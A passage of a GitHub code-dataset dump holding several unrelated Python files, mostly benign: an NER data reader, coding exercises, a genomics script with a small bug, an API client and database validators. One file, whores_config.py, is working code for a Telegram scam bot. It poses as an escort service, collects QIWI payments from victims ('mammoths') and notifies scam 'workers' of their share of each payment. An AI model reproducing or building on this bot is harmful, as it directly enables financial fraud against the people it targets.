list(data.iob_sents())\n sent_features = [x for x in sent_features if x] # remove empty features\n\n labels = []\n sents = []\n for sent_feat in sent_features:\n raw_labels = _sent2labels(sent_feat)\n if is_io_schema:\n processed_labels = map_bio_to_io_labels(raw_labels)\n else:\n processed_labels = raw_labels\n\n self._validate_entity(set(processed_labels), set(supported_entities))\n sent_str = self._detokeniser.detokenise(_sent2tokens(sent_feat))\n labels.append(processed_labels)\n sents.append(sent_str)\n return Data(sents, labels, supported_entities, is_io_schema,)\n","repo_name":"gabechu/pii_recognition","sub_path":"pii_recognition/data_readers/conll_reader.py","file_name":"conll_reader.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30069721747","text":"\"\"\"\r\n\n\nCreate a function that takes a string and returns the number of alphanumeric\ncharacters that occur more than once.\n\n### Examples\n\n duplicate_count(\"abcde\") ➞ 0\n \n duplicate_count(\"aabbcde\") ➞ 2\n \n duplicate_count(\"Indivisibilities\") ➞ 2\n \n duplicate_count(\"Aa\") ➞ 0\n # Case sensitive\n\n### Notes\n\n * Duplicate characters are case sensitive.\n * The input string will contain only alphanumeric characters.\n\n\"\"\"\r\n\ndef duplicate_count(txt):\n letters = {}\n count = 0\n for i in txt:\n letters[i] = txt.count(i)\n letters = {key: value for (key, value) in letters.items() if value > 1 } #List Comprehension\n return(len(letters))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"GrPXERNbrjyCmHPDg_21.py","file_name":"GrPXERNbrjyCmHPDg_21.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31954233622","text":"# importing Pandas, OS, Python Pillow\nimport pandas as pd\nimport os.path\nfrom PIL import Image\n\n\ndef foldercreate():\n import os\n path = 'data/photo'\n # Check whether the specified path exists or not\n isExist = os.path.exists(path)\n\n if not isExist:\n # Create a new directory because it does not exist\n os.makedirs(path)\n\n\ndef append(num, nm, db, dt):\n foldercreate()\n # list of uid, name, date of birth and depertment\n uid = []\n name = []\n dob = []\n dept = []\n uid.append(num)\n name.append(nm)\n dob.append(db[5:])\n dept.append(dt)\n # dictionary of lists\n dict = {'dob': dob, 'id': uid, 'name': name, 'dept': dept}\n # dictionary into dataframe\n df = pd.DataFrame(dict)\n\n if os.path.exists('data/db.csv'):\n # df.to_csv('data/db.csv', mode='a', index=False, header=False)\n df.to_csv('data/db.csv', mode='a', index=False, header=False)\n else:\n df.to_csv('data/db.csv', index=False)\n\n return \"Success\"\n\n\ndef img(uid):\n path = 'data/photo'\n # img_path = str(uid)+'.jpg'\n\n # #########################################################################################\n # # image processing script\n # basewidth = 300\n # # Create an Image Object from an Image\n # img = Image.open(im_dir)\n # wpercent = (basewidth/float(img.size[0]))\n # hsize = int((float(img.size[1])*float(wpercent)))\n # # Make the new image half the width and half the height of the original image\n # img = img.resize((basewidth, hsize), Image.ANTIALIAS)\n # # Save the cropped image\n # img.save(sv_dir + img_path, quality=90)\n # ########################################################################################\n\n image = Image.open('temp.jpg')\n new_image = image.resize((200, 200))\n filename = str(uid)+'.jpg'\n new_image.save(path+'/'+filename)\n","repo_name":"rajarshisamaddar/HappyBirthdayApp","sub_path":"registerModel.py","file_name":"registerModel.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14533898614","text":"import configparser, threading, json, requests\nfrom time import sleep\n\nimport telebot\nfrom SimpleQIWI import *\nfrom telebot import types\nfrom cfg.cfg import *\nfrom core import database\nimport keyboard\nfrom core.misc import *\n\nconfig = configparser.ConfigParser()\nconfig.read(\"default.ini\")\n\nbot = telebot.TeleBot(BOT_TOKEN_TRADE)\nwork_bot = telebot.TeleBot(BOT_TOKEN_WORKER)\nwork_token = BOT_TOKEN_WORKER\nwh_support = config['Whores']['wh_support']\n\nqiwi_number = config['Telegram']['phone']\nqiwi_token = config['Telegram']['token']\n\nadmin = int(config['Work']['admin_id'])\n\nsupport = 1\n\n\ndef notification_ref(code, first_name, message):\n try:\n WTI = database.worker_telegram_id(code)\n first = message.from_user.first_name\n id_m = database.user_num(message.chat.id)\n if str(message.from_user.last_name) != 'None':\n second = ' ' + message.from_user.last_name\n else:\n second = ''\n name = first + second\n name = name.replace('>', '\\\\>')\n name = name.replace('<', '\\\\<')\n username = message.chat.username\n if str(username) == \"None\":\n link = name\n else:\n link = f'{name}'\n text = f'💕 Эскорт\\n\\n[/t{id_m}] {link} - твой новый мамонт \\nTelegram ID: {message.chat.id}'\n\n messages = bot.send_message(WTI, text, parse_mode=\"HTML\", disable_web_page_preview='True')\n\n first = messages.chat.first_name\n if str(messages.from_user.last_name) != 'None':\n second = ' ' + messages.chat.last_name\n else:\n second = ''\n name = first + second\n name = name.replace('>', '\\\\>')\n name = name.replace('<', '\\\\<')\n username = messages.chat.username\n if str(username) == \"None\":\n link1 = name\n else:\n link1 = f'{name}'\n text_log = f\"💕 Эскорт\\n\\nМамонт [/{id_m}] {link} зашел в трейдинг\\nВоркер: {link1}\\nTelegram ID: {messages.chat.id}\"\n bot.send_message(LOGI_ID, text_log, parse_mode=\"HTML\", disable_web_page_preview='True')\n except:\n pass\n\n\ndef notification_thread_ref(code, first_name, message):\n try:\n Thread = threading.Thread(target=notification_ref, args=(code, first_name, message))\n Thread.start()\n except:\n pass\n\n\ndef deposit_timeout(message):\n try:\n end = datetime.now() + timedelta(minutes=15)\n thread = 1\n while thread == 1:\n with open(\"temp.json\", 'r') as file:\n data = json.load(file)\n in_payment = data[\"wh_in_payment\"]\n\n if datetime.now() > end:\n in_payment.remove(message.chat.id)\n with open('temp.json', 'w') as file:\n json.dump(data, file)\n\n thread = 0\n\n elif message.chat.id not in in_payment:\n thread = 0\n\n sleep(0.5)\n\n except Exception as e:\n print(e)\n\n\ndef notification_payment(message, amount):\n try:\n user_id = message.chat.id\n first_name = message.chat.first_name\n username = message.chat.username\n code = database.wh_user_invite_code(user_id)\n WTI = database.worker_telegram_id(code)\n\n if username:\n work_bot.send_message(WTI, f'💗 Эскорт\\n@{username} перешел к оплате\\nСумма: {amount}',\n reply_markup=keyboard.hide_message_kb(), parse_mode='HTML')\n elif first_name:\n work_bot.send_message(WTI,\n f'💗 Эскорт\\n{first_name} перешел к оплате\\nСумма: {amount}',\n reply_markup=keyboard.hide_message_kb(), parse_mode='HTML')\n\n except Exception as e:\n print(e)\n\n\ndef notification_thread_payment(message, amount):\n try:\n Thread = threading.Thread(target=notification_payment, args=(message, amount))\n Thread.start()\n\n except Exception as e:\n print(e)\n\n\ndef notification_pay(call, amount):\n try:\n mamont_user_id = call.message.chat.id\n mamont_first_name = call.message.chat.first_name\n mamont_username = call.message.chat.username\n\n code = database.wh_user_invite_code(mamont_user_id)\n WTI = database.worker_telegram_id(code)\n worker_first_name = database.worker_first_name(WTI)\n worker_username = database.worker_username(WTI)\n\n status = database.user_support_status(mamont_user_id)\n database.worker_update_profit(WTI, float(amount))\n database.user_add_listpay('Шлюхобот', code, amount, mamont_user_id)\n\n if mamont_username:\n mamont = f'@{mamont_username}'\n elif mamont_first_name:\n mamont = f'{mamont_first_name}'\n\n if worker_username:\n worker = f'@{worker_username}'\n elif worker_first_name:\n worker = f'{worker_first_name}'\n\n if WTI in support:\n if status == 1:\n worker_percent = {repl_share_support(amount) + (amount * 0.1)}\n tp = ' (ТП)'\n else:\n worker_percent = {repl_share(amount) + (amount * 0.1)}\n tp = ''\n\n else:\n if status == 1:\n worker_percent = {repl_share_support(amount)}\n tp = ' (ТП)'\n else:\n worker_percent = {repl_share(amount)}\n tp = ''\n\n work_bot.send_message(WTI,\n f'✨ Пополнение | 💗 Эскорт {tp}\\n\\n👷🏿‍♂️ Мамонт: {mamont}\\n\\n⚡️ Сумма пополнения: {amount}₽\\n💸 Твоя доля: ~ {worker_percent}₽',\n parse_mode=\"HTML\")\n work_bot.send_message(channel_id,\n f'✨ Пополнение | 💗 Эскорт {tp}\\n\\n👷🏿‍♂️ Воркер {worker}\\n\\n⚡️ Сумма пополнения: {amount}₽\\n💸 Доля воркера: ~ {worker_percent}₽',\n parse_mode=\"HTML\")\n work_bot.send_message(worker_chat_id,\n f'✨ Пополнение | 💗 Эскорт {tp}\\n\\n👷🏿‍♂️ Воркер {worker}\\n\\n⚡️ Сумма пополнения: {amount}₽\\n💸 Доля воркера: ~ {worker_percent}₽',\n parse_mode=\"HTML\")\n\n except Exception as e:\n print(e)\n\n\ndef notification_thread_pay(call, amount):\n try:\n Thread = threading.Thread(target=notification_pay, args=(call, amount))\n Thread.start()\n\n except Exception as e:\n print(e)\n\n\ndef notification_cancel_payment(call):\n try:\n user_id = call.message.chat.id\n username = call.message.chat.username\n first_name = call.message.chat.first_name\n code = database.wh_user_invite_code(user_id)\n WTI = database.worker_telegram_id(code)\n\n if username:\n work_bot.send_message(WTI, f'💗 Эскорт\\nМамонт @{username} ушел с оплаты',\n reply_markup=keyboard.hide_message_kb(), parse_mode=\"HTML\")\n elif first_name:\n work_bot.send_message(WTI,\n f'💗 Эскорт\\nМамонт {first_name} ушел с оплаты',\n reply_markup=keyboard.hide_message_kb(), parse_mode=\"HTML\")\n\n except Exception as e:\n print(e)\n\n\ndef user_status_pay(call):\n code = database.wh_user_invite_code(call.message.chat.id)\n data = call.message.text.split('\\n')\n amount = data[0].split(' ')\n amount = amount[1]\n comment = data[3].split(':')\n comment = comment[1].replace(' ', '')\n\n api = QApi(phone=qiwi_number, token=qiwi_token)\n payments = api.payments['data']\n\n thread = 0\n for info_payment in payments:\n if (str(info_payment['comment']) == str(comment)):\n if (str(amount) == str(info_payment['sum']['amount'])):\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=f'✨ Заказ оплачен. В течение 10-20 минут оператор выдаст вам адрес девушкии 😘',\n parse_mode=\"Markdown\")\n\n notification_thread_pay(call, amount)\n with open(\"in_deposit.json\", \"r\") as file:\n data = json.load(file)\n data.remove(call.message.chat.id)\n with open(\"in_deposit.json\", \"w\") as file:\n json.dump(data, file)\n thread = 1\n\n if thread == 0:\n bot.answer_callback_query(callback_query_id=call.id, show_alert=False, text=\"✖️ Платеж не найден\")\n\n\ndef wh_pay(message):\n with open(\"temp.json\", \"r\") as file:\n data = json.load(file)\n in_payment = data[\"wh_in_payment\"]\n in_payment.append(message.chat.id)\n\n with open(\"temp.json\", \"w\") as file:\n json.dump(data, file)\n\n price = message.text.split(' ')[1]\n notification_thread_payment(message, price)\n Thread = threading.Thread(target=deposit_timeout, args=(message,))\n Thread.start()\n\n\ndef notification_view_item(call, text):\n code = database.wh_user_invite_code(call.message.chat.id)\n WTI = database.worker_telegram_id(code)\n\n reply = json.dumps({'inline_keyboard': [[{'text': 'Скрыть', 'callback_data': 'HIDE_MESSAGE'}]]})\n params = {'chat_id': WTI, 'text': text, 'reply_markup': reply, 'parse_mode': 'html'}\n resp = requests.post(f'https://api.telegram.org/bot{BOT_TOKEN_WORKER}/sendMessage', params)\n\n\ndef notification_thread_view_item(call):\n user_id = call.message.chat.id\n code = database.wh_user_invite_code(user_id)\n WTI = database.worker_telegram_id(code)\n text = ''\n if call.message.chat.username:\n text = f'💗Эскорт\\n@{call.message.chat.username} смотрит вашу анкету'\n elif call.message.chat.first_name:\n text = f'💗Эскорт\\n{call.message.chat.first_name} смотрит вашу анкету'\n\n work_bot.send_message(WTI, text, reply_markup=keyboard.hide_message_kb(), parse_mode=\"HTML\")\n\n\ndef user_invite_code(message):\n try:\n chat_id = message.chat.id\n exists = database.worker_exists_code(message.text)\n\n if (exists is not False):\n username = repl(message.from_user.username)\n database.user_add_whores(chat_id, message.from_user.first_name, username, message.text)\n bot.send_message(chat_id, f\"Добро пожаловать, {message.from_user.first_name}\",\n parse_mode=\"HTML\", reply_markup=keyboard.whores_keyboard())\n\n notification_thread_ref(message.text, message.from_user.first_name, message)\n else:\n message = bot.send_message(chat_id, '⚠️2 Напишите *правильный код-приглашение* пригласившего Вас человека',\n parse_mode=\"Markdown\")\n bot.register_next_step_handler(message, user_invite_code)\n\n except:\n pass\n\n\ndef notification_in_ordering(call, text):\n code = database.wh_user_invite_code(call.message.chat.id)\n WTI = database.worker_telegram_id(code)\n data = call.message.caption.split('\\n')\n wh_name = data[0]\n\n reply = json.dumps({'inline_keyboard': [[{'text': 'Скрыть', 'callback_data': 'HIDE_MESSAGE'}]]})\n params = {'chat_id': WTI, 'text': text, 'reply_markup': reply, 'parse_mode': 'html'}\n resp = requests.post(f'https://api.telegram.org/bot{work_token}/sendMessage', params)\n\n\ndef notification_thread_in_ordering_start(call):\n data = call.message.caption.split('\\n')\n text = ''\n if call.message.chat.username:\n text = f'💗 Эскорт\\n@{call.message.chat.username} начал выбирать шлюху\\nШлюха: {data[0]}'\n elif call.message.chat.first_name:\n text = f'💗 Эскорт\\n{call.message.chat.first_name} начал выбирать шлюху\\nШлюха: {data[0]}'\n else:\n text = f'💗 Эскорт\\n{call.message.chat.id} начал выбирать шлюху\\nШлюха: {data[0]}'\n\n Thread = threading.Thread(target=notification_in_ordering, args=(call, text))\n Thread.start()\n\n\ndef notification_thread_in_ordering_time(call, time):\n a = {\"1H\": \"1 час\", \"2H\": \"2 часа\", \"NIGHT\": \"ночь\"}\n time = a[time]\n text = ''\n if call.message.chat.username:\n text = f'💗 Эскорт\\n@{call.message.chat.username} взял шлюху на {time}'\n elif call.message.chat.first_name:\n text = f'💗 Эскорт\\n{call.message.chat.first_name} взял шлюху на {time}'\n else:\n text = f'💗 Эскорт\\n{call.message.chat.id} взял шлюху на {time}'\n\n Thread = threading.Thread(target=notification_in_ordering, args=(call, text))\n Thread.start()\n\n\ndef wh_mailing(array, message_send):\n try:\n i = 0\n for chat_id in array:\n try:\n bot.send_message(chat_id, message_send, parse_mode=\"Markdown\")\n i += 1\n except:\n pass\n\n return i\n\n except Exception as e:\n print(e)\n","repo_name":"Wombat2077/obn","sub_path":"whores_config.py","file_name":"whores_config.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39639905255","text":"import argparse, pyBigWig, sys, math, os\n\ndef parse_args(args):\n parser = argparse.ArgumentParser()\n base_group = parser.add_argument_group(\"Base\")\n base_group.add_argument(\"-r\", \"--reference\", type=str,metavar=\"reference.bed12\")\n base_group.add_argument(\"-fwd\", \"--fwd\", type=str, nargs='+',metavar=\"fwd.bw\")\n base_group.add_argument(\"-rev\", \"--rev\", type=str, nargs='+',metavar=\"rev.bw\")\n base_group.add_argument(\"-o\", \"--output\", type=str)\n base_group.add_argument(\"-d\", \"--depth\", type=float)\n base_group.add_argument(\"-c\", \"--cons\", type=int)\n base_group.add_argument(\"-t\", \"--time\", type=str, nargs='+')\n base_group.add_argument(\"-size\",\"--chromsize\",type=str)\n return parser.parse_args(args)\n\ndef forward_length(fw,d,c,chrom,start,end):\n sf = []\n ll = []\n for k in range(0,len(fw)):\n hf = 'bw'+str(k)+'forward'\n sf.append(hf)\n sf[k] = pyBigWig.open(fw[k]) \n try:\n for k in range(0,len(fw)):\n rd=sf[k].values(chrom,start,end)\n for a in range(len(rd)):\n if math.isnan(rd[a]):\n rd[a]= 0\n for i in range(120000-c):\n if max([rd[j] for j in range(i,i+c)]) < d:\n break\n ll.append(i+start)\n return ll\n except RuntimeError as err:\n pass\n\ndef reverse_length(rw,d,c,chrom,start,end):\n sr = []\n ll = []\n for k in range(0,len(rw)):\n hr = 'bw'+str(k)+'reverse'\n sr.append(hr)\n sr[k] = pyBigWig.open(rw[k]) \n try:\n for k in range(0,len(rw)):\n x=sr[k].values(chrom,end,start)\n rd = x[::-1]\n for a in range(len(rd)):\n if math.isnan(rd[a]):\n rd[a]= 0\n for i in range(120000-c):\n if max([rd[j] for j in range(i,i+c)]) < d:\n break\n ll.append(start-i)\n return ll\n except RuntimeError as err:\n pass\n\ndef main(args):\n args = parse_args(args)\n ref = args.reference\n fw = args.fwd\n rw = args.rev\n d = args.depth\n c = args.cons\n t= args.time\n size = args.chromsize\n fl=open('/home/lyy/data1/enlongation/RECQL5/endpoint.txt', 'a')\n chromsizes = {}\n chrlist = []\n for i in [x for x in range(1,23)] + [\"X\",\"Y\"]:\n chrlist.append(\"chr\" + str(i))\n assert len(fw)==len(rw)==len(t)\n with open(size) as f:\n for line in f:\n l = line.strip(\"\\n\").split(\"\\t\")\n chromsizes[l[0]] = int(l[1])\n with open(ref) as f:\n for line in f:\n l = line.strip(\"\\n\").split(\"\\t\")\n if l[5] == \"+\" :\n chrom = l[0]\n if chrom not in chrlist:\n pass\n start = int(l[1])\n end = int(l[1])+120000\n if end > chromsizes[chrom]:\n end = chromsizes[chrom]\n l=[chrom,l[1],l[2],l[3],l[5]]\n for u in forward_length(fw,d,c,chrom,start,end): \n l.append(u)\n fl.write(\"\\t\".join(map(str,l))+'\\n')\n else:\n chrom = l[0]\n if chrom not in chrlist:\n pass\n start = int(l[2])\n end = int(l[2])-120000\n if end < 0:\n end = 0\n l=[chrom,l[1],l[2],l[3],l[5]] \n for u in reverse_length(rw,d,c,chrom,start,end):\n l.append(u)\n fl.write(\"\\t\".join(map(str,l))+'\\n')\n\n fl.close()\n for k in range(0,len(t)):\n sf[k].close()\n sr[k].close()\n\ndef run():\n main(sys.argv[1:])\n\nif __name__ == \"__main__\":\n run()\n\n","repo_name":"liyangyang12/lyy","sub_path":"RECQL5.py","file_name":"RECQL5.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30063887137","text":"\"\"\"\r\n\n\nGiven a list of lists, return a new list of lists containing every element,\n**except for the outer elements**.\n\n### Examples\n\n peel_layer_off([\n [\"a\", \"b\", \"c\", \"d\"],\n [\"e\", \"f\", \"g\", \"h\"],\n [\"i\", \"j\", \"k\", \"l\"],\n [\"m\", \"n\", \"o\", \"p\"]\n ]) ➞ [\n [\"f\", \"g\"],\n [\"j\", \"k\"]\n ]\n \n peel_layer_off([\n [1, 2, 3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [21, 22, 23, 24, 25],\n [26, 27, 28, 29, 30],\n [31, 32, 33, 34, 35]\n ]) ➞ [\n [7, 8, 9],\n [12, 13, 14],\n [17, 18, 19],\n [22, 23, 24],\n [27, 28, 29]\n ]\n \n peel_layer_off([\n [True, False, True],\n [False, False, True],\n [True, True, True]\n ]) ➞ [[False]]\n \n peel_layer_off([\n [\"hello\", \"world\"],\n [\"hello\", \"world\"]\n ]) ➞ []\n\n### Notes\n\n * The 2D grid is always a rectangular/square shape.\n * Always return some form of nested list, unless there are no elements. In that case, return an empty list.\n\n\"\"\"\r\n\ndef peel_layer_off(lst):\n if len(lst) <= 2:\n return []\n else:\n newlst = []\n middle_layer = lst[1:-1]\n for x in range(len(middle_layer)):\n middle_layer[x].pop()\n a = middle_layer\n for x in range(len(a)):\n newlst.append(a[x][1:])\n return newlst\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"EWgdCtSDmRqJPrzoz_23.py","file_name":"EWgdCtSDmRqJPrzoz_23.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42792558348","text":"#!/usr/bin/env python\n\nimport os\nfrom setuptools import setup\nfrom setuptools.extension import Extension\n\ndirectory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(name='lightgrad',\n version='0.0.2',\n description='Autograd Engine written in Python C-API',\n author='Marco S.',\n author_email='mar.salvalaggio@gmail.com',\n license='MIT',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/marcosalvalaggio-bip/lightgrad',\n packages = ['lightgrad'],\n ext_modules = [Extension('lightgrad.engine', sources = ['lightgrad/engine.c'])],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"FredAdiv/lightgrad","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44397049202","text":"x,y=map(int,input().split())\n\ndef chess(x,y):\n try:\n if x==y:\n return 0\n elif x%2==0 and y%2==0:\n return 0\n elif x%2!=0 and y%2!=0:\n return 0\n else:\n return 1\n except ZeroDivisionError:\n if x==0 and y%2==0:\n return 0\n \n elif y==0 and x%2==0:\n return 0\n else:\n return 1\n \n\ndef blackorwhile(x, y):\n if chess(x,y)==0:\n return \"black\"\n elif chess(x,y)==1:\n return \"white\"\n\n\nprint(blackorwhile(x,y))\n","repo_name":"swadhinbiswas/python-problem-solving","sub_path":"chess game.py","file_name":"chess game.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3014358200","text":"from veides.sdk.api.base_client import BaseClient\nfrom veides.sdk.api.exceptions import (\n MethodTimeoutException,\n MethodInvokeException,\n MethodInvalidException,\n MethodUnauthorizedException\n)\nimport logging\n\n\nclass ApiClient(BaseClient):\n def __init__(\n self,\n auth_properties,\n configuration_properties,\n log_level=logging.WARN,\n logger=None\n ):\n BaseClient.__init__(\n self,\n base_url=configuration_properties.base_url,\n token=auth_properties.token,\n log_level=log_level,\n logger=logger\n )\n\n def invoke_method(self, agent, name, payload, timeout=30000):\n \"\"\"\n Invokes a method on an agent and returns the method response (code and payload) sent by agent\n\n :param agent: Agent's client id\n :type agent: str\n :param name: Method name\n :type agent: str\n :param payload: Method payload to process by agent\n :type payload: dict|list|str|int|float|bool\n :param timeout: Invoked method will fail after timeout (in ms) period if agent will not send method response\n :type timeout: int\n :return: (int, dict|list|str|int|float|bool)\n \"\"\"\n if not isinstance(agent, str):\n raise TypeError('agent client id should be a string')\n\n if len(agent) == 0:\n raise ValueError('agent client id should be at least 1 length')\n\n if not isinstance(name, str):\n raise TypeError('method name should be a string')\n\n if len(name) == 0:\n raise ValueError('method name should be at least 1 length')\n\n if payload is None:\n raise ValueError('payload should be one of: dictionary, list, string, integer, float, boolean')\n\n if not isinstance(timeout, int):\n raise TypeError('timeout should be an integer')\n\n if timeout < 1000:\n timeout = 1000\n self.logger.warning(\n 'Provided invoke method timeout is lesser than allowed. Timeout adjusted to %d' % timeout\n )\n elif timeout > 30000:\n timeout = 30000\n self.logger.warning(\n 'Provided invoke method timeout is greater than allowed. Timeout adjusted to %d' % timeout\n )\n\n self.logger.info('Invoking method {} on agent {}'.format(name, agent))\n\n response = self._post('/agents/{}/methods/{}'.format(agent, name), payload, {'timeout': timeout})\n\n if response.status_code == 504:\n raise MethodTimeoutException('Method {} on agent {} timeouted after {} ms'.format(name, agent, timeout))\n\n if response.status_code == 500:\n raise MethodInvokeException('Error occurred while invoking method {} on agent {}'.format(name, agent))\n\n if response.status_code == 400:\n raise MethodInvalidException(response.json().get('error'))\n\n if response.status_code == 403:\n raise MethodUnauthorizedException(response.json().get('error'))\n\n return response.status_code, response.json()\n","repo_name":"Veides/veides-sdk-python","sub_path":"veides/sdk/api/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32595642503","text":"from pprint import pprint\nfrom typing import Any, Dict, Generic, List, Optional, Set, Tuple, TypeVar\nfrom pymongo import MongoClient\nfrom datetime import datetime\n\nfrom pymongo.collection import ReturnDocument\n\nDB_DEV = \"ellatu_dev\"\n\nCOL_USERS = \"users\"\nCOL_LEVELS = \"levels\"\nCOL_WORKPLACES = \"workplaces\"\nCOL_SOLUTIONS = \"solutions\"\nCOL_WORLDS = \"worlds\"\n\nMAX_CODEBLOCKS = 3\n\nValue = Any\n\nT = TypeVar(\"T\")\n\nCollection = Any\nDocument = Dict[Any, Any]\nMongoId = str\n\nClientService = str\nClientId = str\nUserKey = Tuple[ClientService, ClientId]\nWorldcode = str\nLevelcode = str\nLevelKey = Tuple[Worldcode, Levelcode]\n\n\n###############################################################################\n# Misc\n###############################################################################\n\ndef int_in_range(value: int, min_value: Optional[int],\n max_value: Optional[int]) -> bool:\n if min_value is not None and value < min_value:\n return False\n if max_value is not None and value > max_value:\n return False\n return True\n\n\ndef get_userkey(doc: Document) -> UserKey:\n return (doc[\"client_ser\"], doc['client_id'])\n\n\ndef get_levelkey(level: Document) -> LevelKey:\n return (level[\"worldcode\"], level[\"code\"])\n\n###############################################################################\n# Validation\n###############################################################################\n\n\ndef val_error(trace: List[str], message: str) -> bool:\n trace.append(message)\n return False\n\n\nclass Validator(Generic[T]):\n\n def __init__(self, message: str = \"invalid value\"):\n self.message = message\n\n def pred(self, value: T, trace: List[str]) -> bool:\n return False\n\n def validate(self, value: T) -> bool:\n trace: List[str] = []\n if not self.pred(value, trace):\n print(\"Following value is invalid: \")\n pprint(value)\n print(\"\\n\".join(trace))\n return False\n return True\n\n\nclass StringValidator(Validator[str]):\n\n def __init__(self, min_size: Optional[int] = None,\n max_size: Optional[int] = None,\n charset: Optional[Set[str]] = None):\n super().__init__(message=\"invalid string\")\n self.min_size = min_size\n self.max_size = max_size\n self.charset = charset\n\n def pred(self, value: str, trace: List[str]) -> bool:\n if not int_in_range(len(value), self.min_size, self.max_size):\n return val_error(trace, \"Invalid string length\")\n if self.charset:\n for c in value:\n if c not in self.charset:\n return val_error(trace, \"Character not in the allowed \" +\n \"charset\")\n return True\n\n\nclass IntegerValidator(Validator[int]):\n def __init__(self, min_value: Optional[int] = None,\n max_value: Optional[int] = None):\n super().__init__(message=\"invalid number\")\n self.min_value = min_value\n self.max_value = max_value\n\n def pred(self, value: int, trace: List[str]) -> bool:\n if not isinstance(value, int):\n return val_error(trace, \"Not integer\")\n if not int_in_range(value, self.min_value, self.max_value):\n return val_error(trace, f\"Not in the range {self.min_value}\"\n + f\" {self.max_value}\")\n return True\n\n\nclass RefKeyValidator(Validator[T]):\n\n def __init__(self, collection: Collection, atr_name: str):\n super().__init__(\"key not present in collection\")\n self.collection = collection\n self.atr_name = atr_name\n\n def pred(self, value: T, trace: List[str]) -> bool:\n doc = {}\n doc[self.atr_name] = value\n if not self.collection.find_one(doc):\n return val_error(trace, f\"Reference ({value}) not in the\"\n + \" collection\")\n return True\n\n\nclass RefValidator(Validator[Document]):\n\n def __init__(self, collection: Collection, keys: Dict[str, str]):\n super().__init__(\"value not present\")\n self.collection = collection\n self.keys = keys\n\n def pred(self, value: Document, trace: List[str]) -> bool:\n mask = {}\n for key in self.keys:\n if key not in value:\n return val_error(trace, \"The key referenced is not in the\"\n + \" value\")\n mask[self.keys[key]] = value[key]\n if not self.collection.find_one(mask):\n return val_error(trace, \"The reference is not present\")\n return True\n\n\nclass PrimaryKeyValidator(Validator[Document]):\n\n def __init__(self, collection: Collection, keys: List[str]):\n super().__init__(\"primary key already present\")\n self.collection = collection\n self.keys = keys\n\n def pred(self, value: Document, trace: List[str]) -> bool:\n mask = {}\n for key in self.keys:\n if key not in value:\n return val_error(trace, \"The key that is part of the primary\"\n + \"key is not present\")\n mask[key] = value[key]\n if self.collection.find_one(mask):\n return val_error(trace, \"The primary key is already present\")\n\n return True\n\n\nclass ReqValidator(Validator[Optional[Any]]):\n\n def __init__(self) -> None:\n super().__init__(\"value is required\")\n\n def pred(self, value: Optional[Any], _: List[str]) -> bool:\n return value is not None\n\n\nclass ReqFieldsValidator(Validator[Document]):\n def __init__(self, keys: List[str]):\n super().__init__(\"required value is not present\")\n self.keys = keys\n\n def pred(self, value: Document, trace: List[str]) -> bool:\n for key in self.keys:\n if key not in value or value[key] is None:\n return val_error(trace, f\"The required value ({key}) is \" +\n \"not present\")\n return True\n\n\nclass DictValidator(Validator[Document]):\n\n def __init__(self, scheme: Dict[str, Validator[Any]]):\n super().__init__(\"value not in scheme\")\n self.scheme = scheme\n\n def pred(self, value: Document, trace: List[str]) -> bool:\n\n if not isinstance(value, dict):\n return val_error(trace, \"The value is not dictionary\")\n\n for key in self.scheme:\n if key not in value:\n return val_error(trace, f\"Key {key} is not present\")\n if not self.scheme[key].pred(value[key], trace):\n return val_error(trace, f\"The validator failed on key: {key}\")\n\n return True\n\n\nclass SequentialValidator(Validator[T]):\n\n def __init__(self, validators: List[Validator[T]]):\n super().__init__(\"one of validators failed\")\n self.validators = validators\n\n def pred(self, value: T, trace: List[str]) -> bool:\n for validator in self.validators:\n if not validator.pred(value, trace):\n return val_error(trace, \"Sequence failed\")\n return True\n\n\nclass ListValidator(Validator[List[T]]):\n\n def __init__(self, validator: Optional[Validator[T]]):\n super().__init__(\"one of the values is not valid\")\n self.validator = validator\n\n def pred(self, value: List[T], trace: List[str]) -> bool:\n if not isinstance(value, list):\n return val_error(trace, \"The value is not list\")\n if self.validator is not None:\n for subvalue in value:\n if not self.validator.pred(subvalue, trace):\n return val_error(trace, \"ListValidator failed on \"\n + f\"{subvalue}\")\n return True\n\n\nclass OptionalValidator(Validator[T]):\n\n def __init__(self, validator: Validator[T]):\n super().__init__(\"the value is not none\")\n self.validator = validator\n\n def pred(self, value: T, trace: List[str]) -> bool:\n if value is None:\n return True\n return self.validator.pred(value, trace)\n\n\n###############################################################################\n# Models\n###############################################################################\n\nKwargs = Any\n\n\nclass Model:\n def __init__(self, collection: Collection):\n self.collection = collection\n self.validator: Optional[Validator[Document]] = None\n self.doc_validator: 